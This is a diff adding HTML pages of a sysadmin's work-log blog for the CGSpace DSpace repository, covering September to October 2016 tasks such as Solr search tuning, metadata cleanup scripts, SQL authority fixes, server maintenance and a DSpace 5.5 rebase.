+<li>Generate a new list of sponsors from the database for Peter Ballantyne so we can clean them up and update the controlled vocabulary</li>
+</ul>
+<h2 id="2016-09-21">2016-09-21</h2>
+<ul>
+<li>Turns out the Solr search logic switched from OR to AND in DSpace 6.0 and the change is easy to backport: <a href="https://jira.duraspace.org/browse/DS-2809">https://jira.duraspace.org/browse/DS-2809</a></li>
+<li>We just need to set this in <code>dspace/solr/search/conf/schema.xml</code>:</li>
+</ul>
+<pre tabindex="0"><code>&lt;solrQueryParser defaultOperator=&#34;AND&#34;/&gt;
+</code></pre><ul>
+<li>It actually works really well, and search results return much less hits now (before, after):</li>
+</ul>
+<p><img src="/cgspace-notes/2016/09/cgspace-search.png" alt="CGSpace search with &amp;ldquo;OR&amp;rdquo; boolean logic">
+<img src="/cgspace-notes/2016/09/dspacetest-search.png" alt="DSpace Test search with &amp;ldquo;AND&amp;rdquo; boolean logic"></p>
+<ul>
+<li>Found a way to improve the configuration of Atmire&rsquo;s Content and Usage Analysis (CUA) module for date fields</li>
+</ul>
+<pre tabindex="0"><code>-content.analysis.dataset.option.8=metadata:dateAccessioned:discovery
++content.analysis.dataset.option.8=metadata:dc.date.accessioned:date(month)
+</code></pre><ul>
+<li>This allows the module to treat the field as a date rather than a text string, so we can interrogate it more intelligently</li>
+<li>Add <code>dc.date.accessioned</code> to XMLUI Discovery search filters</li>
+<li>Major CGSpace crash because ILRI forgot to pay the Linode bill</li>
+<li>45 minutes of downtime!</li>
+<li>Start processing the fixes to <code>dc.description.sponsorship</code> from Peter Ballantyne:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i sponsors-fix-23.csv -f dc.description.sponsorship -t correct -m 29 -d dspace -u dspace -p fuuu
+$ ./delete-metadata-values.py -i sponsors-delete-8.csv -f dc.description.sponsorship -m 29 -d dspace -u dspace -p fuuu
+</code></pre><ul>
+<li>I need to run these and the others from a few days ago on CGSpace the next time we run updates</li>
+<li>Also, I need to update the controlled vocab for sponsors based on these</li>
+</ul>
+<h2 id="2016-09-22">2016-09-22</h2>
+<ul>
+<li>Update controlled vocabulary for sponsorship based on the latest corrected values from the database</li>
+</ul>
+<h2 id="2016-09-25">2016-09-25</h2>
+<ul>
+<li>Merge accession date improvements for CUA module (<a href="https://github.com/ilri/DSpace/pull/275">#275</a>)</li>
+<li>Merge addition of accession date to Discovery search filters (<a href="https://github.com/ilri/DSpace/pull/276">#276</a>)</li>
+<li>Merge updates to sponsorship controlled vocabulary (<a href="https://github.com/ilri/DSpace/pull/277">#277</a>)</li>
+<li>I&rsquo;ve been trying to add a search filter for <code>dc.description</code> so the IITA people can search for some tags they use there, but for some reason the filter never shows up in Atmire&rsquo;s CUA</li>
+<li>Not sure if it&rsquo;s something like we already have too many filters there (30), or the filter name is reserved, etc&hellip;</li>
+<li>Generate a list of ILRI subjects for Peter and Abenet to look through/fix:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where resource_type_id=2 and metadata_field_id=203 group by text_value order by count desc) to /tmp/ilrisubjects.csv with csv;
+</code></pre><ul>
+<li>Regenerate Discovery indexes a few times after playing with <code>discovery.xml</code> index definitions (syntax, parameters, etc).</li>
+<li>Merge changes to boolean logic in Solr search (<a href="https://github.com/ilri/DSpace/pull/274">#274</a>)</li>
+<li>Run all sponsorship and affiliation fixes on CGSpace, deploy latest <code>5_x-prod</code> branch, and re-index Discovery on CGSpace</li>
+<li>Tested OCSP stapling on DSpace Test&rsquo;s nginx and it works:</li>
+</ul>
+<pre tabindex="0"><code>$ openssl s_client -connect dspacetest.cgiar.org:443 -servername dspacetest.cgiar.org -tls1_2 -tlsextdebug -status
+...
+OCSP response:
+======================================
+OCSP Response Data:
+...
+    Cert Status: good
+</code></pre><ul>
+<li>I&rsquo;ve been monitoring this for almost two years in this GitHub issue: <a href="https://github.com/ilri/DSpace/issues/38">https://github.com/ilri/DSpace/issues/38</a></li>
+</ul>
+<h2 id="2016-09-27">2016-09-27</h2>
+<ul>
+<li>Discuss fixing some ORCIDs for CCAFS author Sonja Vermeulen with Magdalena Haman</li>
+<li>This author has a few variations:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeu
+len, S%&#39;;
+</code></pre><ul>
+<li>And it looks like <code>fe4b719f-6cc4-4d65-8504-7a83130b9f83</code> is the authority with the correct ORCID linked</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;fe4b719f-6cc4-4d65-8504-7a83130b9f83w&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeulen, S%&#39;;
+UPDATE 101
+</code></pre><ul>
+<li>Hmm, now her name is missing from the authors facet and only shows the authority ID</li>
+<li>On the production server there is an item with her ORCID but it is using a different authority: f01f7b7b-be3f-4df7-a61d-b73c067de88d</li>
+<li>Maybe I used the wrong one&hellip; I need to look again at the production database</li>
+<li>On a clean snapshot of the database I see the correct authority should be <code>f01f7b7b-be3f-4df7-a61d-b73c067de88d</code>, not <code>fe4b719f-6cc4-4d65-8504-7a83130b9f83</code></li>
+<li>Updating her authorities again and reindexing:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;f01f7b7b-be3f-4df7-a61d-b73c067de88d&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeulen, S%&#39;;
+UPDATE 101
+</code></pre><ul>
+<li>Use GitHub icon from Font Awesome instead of a PNG to save one extra network request</li>
+<li>We can also replace the RSS and mail icons in community text!</li>
+<li>Fix reference to <code>dc.type.*</code> in Atmire CUA module, as we now only index <code>dc.type</code> for &ldquo;Output type&rdquo;</li>
+</ul>
+<h2 id="2016-09-28">2016-09-28</h2>
+<ul>
+<li>Make a placeholder pull request for <code>discovery.xml</code> changes (<a href="https://github.com/ilri/DSpace/pull/278">#278</a>), as I still need to test their effect on Atmire content analysis module</li>
+<li>Make a placeholder pull request for Font Awesome changes (<a href="https://github.com/ilri/DSpace/pull/279">#279</a>), which replaces the GitHub image in the footer with an icon, and add style for RSS and @ icons that I will start replacing in community/collection HTML intros</li>
+<li>Had some issues with local test server after messing with Solr too much, had to blow everything away and re-install from CGSpace</li>
+<li>Going to try to update Sonja Vermeulen&rsquo;s authority to 2b4166b7-6e4d-4f66-9d8b-ddfbec9a6ae0, as that seems to be one of her authorities that has an ORCID</li>
+<li>Merge Font Awesome changes (<a href="https://github.com/ilri/DSpace/pull/279">#279</a>)</li>
+<li>Minor fix to a string in Atmire&rsquo;s CUA module (<a href="https://github.com/ilri/DSpace/pull/280">#280</a>)</li>
+<li>This seems to be what I&rsquo;ll need to do for Sonja Vermeulen (but with <code>2b4166b7-6e4d-4f66-9d8b-ddfbec9a6ae0</code> instead on the live site):</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;09e4da69-33a3-45ca-b110-7d3f82d2d6d2&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeulen, S%&#39;;
+dspacetest=# update metadatavalue set authority=&#39;09e4da69-33a3-45ca-b110-7d3f82d2d6d2&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeulen SJ%&#39;;
+</code></pre><ul>
+<li>And then update Discovery and Authority indexes</li>
+<li>Minor fix for &ldquo;Subject&rdquo; string in Discovery search and Atmire modules (<a href="https://github.com/ilri/DSpace/pull/281">#281</a>)</li>
+<li>Start testing batch fixes for ILRI subject from Peter:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ilrisubjects-fix-32.csv -f cg.subject.ilri -t correct -m 203 -d dspace -u dspace -p fuuuu
+$ ./delete-metadata-values.py -i ilrisubjects-delete-13.csv -f cg.subject.ilri -m 203 -d dspace -u dspace -p fuuu
+</code></pre><h2 id="2016-09-29">2016-09-29</h2>
+<ul>
+<li>Add <code>cg.identifier.ciatproject</code> to metadata registry in preparation for CIAT project tag</li>
+<li>Merge changes for CIAT project tag (<a href="https://github.com/ilri/DSpace/pull/282">#282</a>)</li>
+<li>DSpace Test (linode02) became unresponsive for some reason, I had to hard reboot it from the Linode console</li>
+<li>People on DSpace mailing list gave me a query to get authors from certain collections:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# select distinct text_value from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/5472&#39;, &#39;10568/5473&#39;)));
+</code></pre><h2 id="2016-09-30">2016-09-30</h2>
+<ul>
+<li>Deny access to REST API&rsquo;s <code>find-by-metadata-field</code> endpoint to protect against an upstream security issue (DS-3250)</li>
+<li>There is a patch but it is only for 5.5 and doesn&rsquo;t apply cleanly to 5.1</li>
+</ul>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2016-10/index.html b/docs/2016-10/index.html
new file mode 100644
index 000000000..a9c9ea2c9
--- /dev/null
+++ b/docs/2016-10/index.html
@@ -0,0 +1,426 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="October, 2016" />
+<meta property="og:description" content="2016-10-03
+
+Testing adding ORCIDs to a CSV file for a single item to see if the author orders get messed up
+Need to test the following scenarios to see how author order is affected:
+
+ORCIDs only
+ORCIDs plus normal authors
+
+
+I exported a random item&rsquo;s metadata as CSV, deleted all columns except id and collection, and made a new coloum called ORCID:dc.contributor.author with the following random ORCIDs from the ORCID registry:
+
+0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2016-10/" />
+<meta property="article:published_time" content="2016-10-03T15:53:00+03:00" />
+<meta property="article:modified_time" content="2020-04-13T15:30:24+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="October, 2016"/>
+<meta name="twitter:description" content="2016-10-03
+
+Testing adding ORCIDs to a CSV file for a single item to see if the author orders get messed up
+Need to test the following scenarios to see how author order is affected:
+
+ORCIDs only
+ORCIDs plus normal authors
+
+
+I exported a random item&rsquo;s metadata as CSV, deleted all columns except id and collection, and made a new coloum called ORCID:dc.contributor.author with the following random ORCIDs from the ORCID registry:
+
+0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "October, 2016",
+  "url": "https://alanorth.github.io/cgspace-notes/2016-10/",
+  "wordCount": "1828",
+  "datePublished": "2016-10-03T15:53:00+03:00",
+  "dateModified": "2020-04-13T15:30:24+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2016-10/">
+
+    <title>October, 2016 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-10/">October, 2016</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2016-10-03T15:53:00+03:00">Mon Oct 03, 2016</time>
+ in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-10-03">2016-10-03</h2>
+<ul>
+<li>Testing adding <a href="https://wiki.lyrasis.org/display/DSDOC5x/ORCID+Integration#ORCIDIntegration-EditingexistingitemsusingBatchCSVEditing">ORCIDs to a CSV</a> file for a single item to see if the author orders get messed up</li>
+<li>Need to test the following scenarios to see how author order is affected:
+<ul>
+<li>ORCIDs only</li>
+<li>ORCIDs plus normal authors</li>
+</ul>
+</li>
+<li>I exported a random item&rsquo;s metadata as CSV, deleted <em>all columns</em> except id and collection, and made a new coloum called <code>ORCID:dc.contributor.author</code> with the following random ORCIDs from the ORCID registry:</li>
+</ul>
+<pre tabindex="0"><code>0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X
+</code></pre><ul>
+<li>Hmm, with the <code>dc.contributor.author</code> column removed, DSpace doesn&rsquo;t detect any changes</li>
+<li>With a blank <code>dc.contributor.author</code> column, DSpace wants to remove all non-ORCID authors and add the new ORCID authors</li>
+<li>I added the <a href="https://github.com/ilri/DSpace/issues/234">disclaimer text</a> to the About page, then added a footer link to the disclaimer&rsquo;s ID, but there is a Bootstrap issue that causes the page content to disappear when using in-page anchors: <a href="https://github.com/twbs/bootstrap/issues/1768">https://github.com/twbs/bootstrap/issues/1768</a></li>
+</ul>
+<p><img src="/cgspace-notes/2016/10/bootstrap-issue.png" alt="Bootstrap issue with in-page anchors"></p>
+<ul>
+<li>Looks like we&rsquo;ll just have to add the text to the About page (without a link) or add a separate page</li>
+</ul>
+<h2 id="2016-10-04">2016-10-04</h2>
+<ul>
+<li>Start testing cleanups of authors that Peter sent last week</li>
+<li>Out of 40,000+ rows, Peter had indicated corrections for ~3,200 of them—too many to look through carefully, so I did some basic quality checking:
+<ul>
+<li>Trim leading/trailing whitespace</li>
+<li>Find invalid characters</li>
+<li>Cluster values to merge obvious authors</li>
+</ul>
+</li>
+<li>That left us with 3,180 valid corrections and 3 deletions:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i authors-fix-3180.csv -f dc.contributor.author -t correct -m 3 -d dspacetest -u dspacetest -p fuuu
+$ ./delete-metadata-values.py -i authors-delete-3.csv -f dc.contributor.author -m 3 -d dspacetest -u dspacetest -p fuuu
+</code></pre><ul>
+<li>Remove old about page (<a href="https://github.com/ilri/DSpace/pull/284">#284</a>)</li>
+<li>CGSpace crashed a few times today</li>
+<li>Generate list of unique authors in CCAFS collections:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/32729&#39;, &#39;10568/5472&#39;, &#39;10568/5473&#39;, &#39;10568/10288&#39;, &#39;10568/70974&#39;, &#39;10568/3547&#39;, &#39;10568/3549&#39;, &#39;10568/3531&#39;,&#39;10568/16890&#39;,&#39;10568/5470&#39;,&#39;10568/3546&#39;, &#39;10568/36024&#39;, &#39;10568/66581&#39;, &#39;10568/21789&#39;, &#39;10568/5469&#39;, &#39;10568/5468&#39;, &#39;10568/3548&#39;, &#39;10568/71053&#39;, &#39;10568/25167&#39;))) group by text_value order by count desc) to /tmp/ccafs-authors.csv with csv;
+</code></pre><h2 id="2016-10-05">2016-10-05</h2>
+<ul>
+<li>Work on more infrastructure cleanups for Ansible DSpace role</li>
+<li>Clean up Let&rsquo;s Encrypt plumbing and submit pull request for rmg-ansible-public (<a href="https://github.com/ilri/rmg-ansible-public/pull/60">#60</a>)</li>
+</ul>
+<h2 id="2016-10-06">2016-10-06</h2>
+<ul>
+<li>Nice! DSpace Test (linode02) is now having <code>java.lang.OutOfMemoryError: Java heap space</code> errors&hellip;</li>
+<li>Heap space is 2048m, and we have 5GB of RAM being used for OS cache (Solr!) so let&rsquo;s just bump the memory to 3072m</li>
+<li>Magdalena from CCAFS asked why the colors in the thumbnails for these <a href="https://cgspace.cgiar.org/handle/10568/71249">two</a> <a href="https://cgspace.cgiar.org/handle/10568/71259">items</a> look different, even though they are the same in the PDF itself</li>
+</ul>
+<p><img src="/cgspace-notes/2016/10/cmyk-vs-srgb.jpg" alt="CMYK vs sRGB colors"></p>
+<ul>
+<li>Turns out the first PDF was exported from InDesign using CMYK and the second one was using sRGB</li>
+<li>Run all system updates on DSpace Test and reboot it</li>
+</ul>
+<h2 id="2016-10-08">2016-10-08</h2>
+<ul>
+<li>Re-deploy CGSpace with latest changes from late September and early October</li>
+<li>Run fixes for ILRI subjects and delete blank metadata values:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
+DELETE 11
+</code></pre><ul>
+<li>Run all system updates and reboot CGSpace</li>
+<li>Delete ten gigs of old 2015 Tomcat logs that never got rotated (WTF?):</li>
+</ul>
+<pre tabindex="0"><code>root@linode01:~# ls -lh /var/log/tomcat7/localhost_access_log.2015* | wc -l
+47
+</code></pre><ul>
+<li>Delete 2GB <code>cron-filter-media.log</code> file, as it is just a log from a cron job and it doesn&rsquo;t get rotated like normal log files (almost a year now maybe)</li>
+</ul>
+<h2 id="2016-10-14">2016-10-14</h2>
+<ul>
+<li>Run all system updates on DSpace Test and reboot server</li>
+<li>Looking into some issues with Discovery filters in Atmire&rsquo;s content and usage analysis module after adjusting the filter class</li>
+<li>Looks like changing the filters from <code>configuration.DiscoverySearchFilterFacet</code> to <code>configuration.DiscoverySearchFilter</code> breaks them in Atmire CUA module</li>
+</ul>
+<h2 id="2016-10-17">2016-10-17</h2>
+<ul>
+<li>A bit more cleanup on the CCAFS authors, and run the corrections on DSpace Test:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ccafs-authors-oct-16.csv -f dc.contributor.author -t &#39;correct name&#39; -m 3 -d dspace -u dspace -p fuuu
+</code></pre><ul>
+<li>One observation is that there are still some old versions of names in the author lookup because authors appear in other communities (as we only corrected authors from CCAFS for this round)</li>
+</ul>
+<h2 id="2016-10-18">2016-10-18</h2>
+<ul>
+<li>Start working on DSpace 5.5 porting work again:</li>
+</ul>
+<pre tabindex="0"><code>$ git checkout -b 5_x-55 5_x-prod
+$ git rebase -i dspace-5.5
+</code></pre><ul>
+<li>Have to fix about ten merge conflicts, mostly in the SCSS for the CGIAR theme</li>
+<li>Skip 1e34751b8cf17021f45d4cf2b9a5800c93fb4cb2 in lieu of upstream&rsquo;s 55e623d1c2b8b7b1fa45db6728e172e06bfa8598 (fixes X-Forwarded-For header) because I had made the same fix myself and it&rsquo;s better to use the upstream one</li>
+<li>I notice this rebase gets rid of GitHub merge commits&hellip; which actually might be fine because merges are fucking annoying to deal with when remote people merge without pulling and rebasing their branch first</li>
+<li>Finished up applying the 5.5 sitemap changes to all themes</li>
+<li>Merge the <code>discovery.xml</code> cleanups (<a href="https://github.com/ilri/DSpace/pull/278">#278</a>)</li>
+<li>Merge some minor edits to the distribution license (<a href="https://github.com/ilri/DSpace/pull/285">#285</a>)</li>
+</ul>
+<h2 id="2016-10-19">2016-10-19</h2>
+<ul>
+<li>When we move to DSpace 5.5 we should also cherry pick some patches from 5.6 branch:
+<ul>
+<li><a href="https://jira.duraspace.org/browse/DS-3246">memory cleanup</a>: 9f0f5940e7921765c6a22e85337331656b18a403</li>
+<li>sql injection: c6fda557f731dbc200d7d58b8b61563f86fe6d06</li>
+<li>pdfbox security issue: b5330b78153b2052ed3dc2fd65917ccdbfcc0439</li>
+</ul>
+</li>
+</ul>
+<h2 id="2016-10-20">2016-10-20</h2>
+<ul>
+<li>Run CCAFS author corrections on CGSpace</li>
+<li>Discovery reindexing took forever and kinda caused CGSpace to crash, so I ran all system updates and rebooted the server</li>
+</ul>
+<h2 id="2016-10-25">2016-10-25</h2>
+<ul>
+<li>Move the LIVES community from the top level to the ILRI projects community</li>
+</ul>
+<pre tabindex="0"><code>$ /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/27629 --child=10568/25101
+</code></pre><ul>
+<li>Start testing some things for DSpace 5.5, like command line metadata import, PDF media filter, and Atmire CUA</li>
+<li>Start looking at batch fixing of &ldquo;old&rdquo; ILRI website links without www or https, for example:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and text_value like &#39;http://ilri.org%&#39;;
+</code></pre><ul>
+<li>Also CCAFS has HTTPS and their links should use it where possible:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and text_value like &#39;http://ccafs.cgiar.org%&#39;;
+</code></pre><ul>
+<li>And this will find community and collection HTML text that is using the old style PNG/JPG icons for RSS and email (we should be using Font Awesome icons instead):</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select text_value from metadatavalue where resource_type_id in (3,4) and text_value like &#39;%Iconrss2.png%&#39;;
+</code></pre><ul>
+<li>Turns out there are shit tons of varieties of this, like with http, https, www, separate <code>&lt;/img&gt;</code> tags, alignments, etc</li>
+<li>Had to find all variations and replace them individually:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;/&gt;&#39;,&#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;/&gt;%&#39;;
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;/&gt;%&#39;;
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;%&#39;;
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;%&#39;;
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;%&#39;;
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;%&#39;;
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;%&#39;;
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;%&#39;;
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/Iconrss2.png&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/email.jpg&#34;/&gt;%&#39;;
